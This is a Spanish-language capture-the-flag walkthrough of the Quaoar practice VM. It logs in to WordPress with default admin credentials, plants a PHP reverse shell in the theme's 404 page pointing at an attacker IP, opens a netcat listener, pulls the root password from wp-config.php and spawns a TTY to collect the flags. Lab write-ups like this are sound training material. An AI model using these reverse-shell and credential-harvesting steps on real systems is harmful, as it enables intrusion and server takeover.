hackfest2016: Quaoar - [ Walkthrough ]

En este tutorial vamos a resolver la maquina virtual hackfest2016: Quaoar la cual la pueden descargar desde No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.

Viendo la descripción de la maquina virtual pide que encontremos 3 flags.

There are 3 flags on this machine 

1. Get a shell 
2. Get root access 
3. There is a post exploitation flag on the box

Laboratorio:
Atacante Kali: 192.168.1.100 
Victima Quaoar: 192.168.1.101

Escaneo:


Como vemos tenemos un apache corriendo en el 80.


Buscando directorios con nmap


Genial tenemos un wordpress. Ahora le pasare un scanner conocido como No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Al poco tiempo del scaneo nos mostrará que el sitio esta utilizando contraseñas por defecto que serian admin:admin así que vamos a omitir cualquier explotación de vulnerabilidades web y obtendremos acceso al equipo mediante una reverse shell en php.

Ingresando al administrador del blog

user: admin
password:admin

Una vez echo esto, nos vamos al appearance --> editor  --> 404.php, la página 404 es la que tendra la reverse shell que voy a utilizar que será una de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.


Procedemos a modificar la reverse shell.

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

IP Atacante: 192.168.1.100
Por: lo dejare por defecto.

Ahora pondremos a la escucha nuestro netcat

nc -v -n -l -p 1234

Al ingresar a la dirección de la página 404 obtendremos acceso al sistema, la url seria No tienes permitido ver enlaces. Registrate o Entra a tu cuenta. twentyfourteen es el theme que se esta utilizando en el sitio.


Flag: 1. Get a shell


Con el comando locate voy a buscar el archivo flag.txt, al hacer eso nos dice que se encuentra en la carpeta /home/wpadmin/, después solo vere su contenido con el comando cat.

Flag 2. Get root access

Como el sitio esta en wordpress se me ocurrio hacerle un cat al archivo wp-config.php muchas veces colocan por ahi la password root


Genial la contraseña es: rootpassword!

Ahora voy a obtener una bash con el siguiente comando.

python -c 'import pty;pty.spawn("/bin/bash")'

Yeaaa! como podemos ver, en la carpeta root se encuentra la segunda flag.

Flag 3. There is a post exploitation flag on the box.

Sin duda esta fué la que me tomo más tiempo, para encontra esta flag utilice de recurso No tienes permitido ver enlaces. Registrate o Entra a tu cuenta después de un rato leyendo el repositorio hago un cat sobre  /etc/crontab

Crontab es un simple archivo de texto que guarda una lista de comandos a ejecutar en un tiempo especificado por el usuario

Nada de flag ):, ahora me iré a ver la carperta cron.d en el directorio etc.


Fuck yea! Al hacerle un cat al archivo php5 que se encontraba en la carpeta nos arroja información y un texto md5 cual es la ultima flag.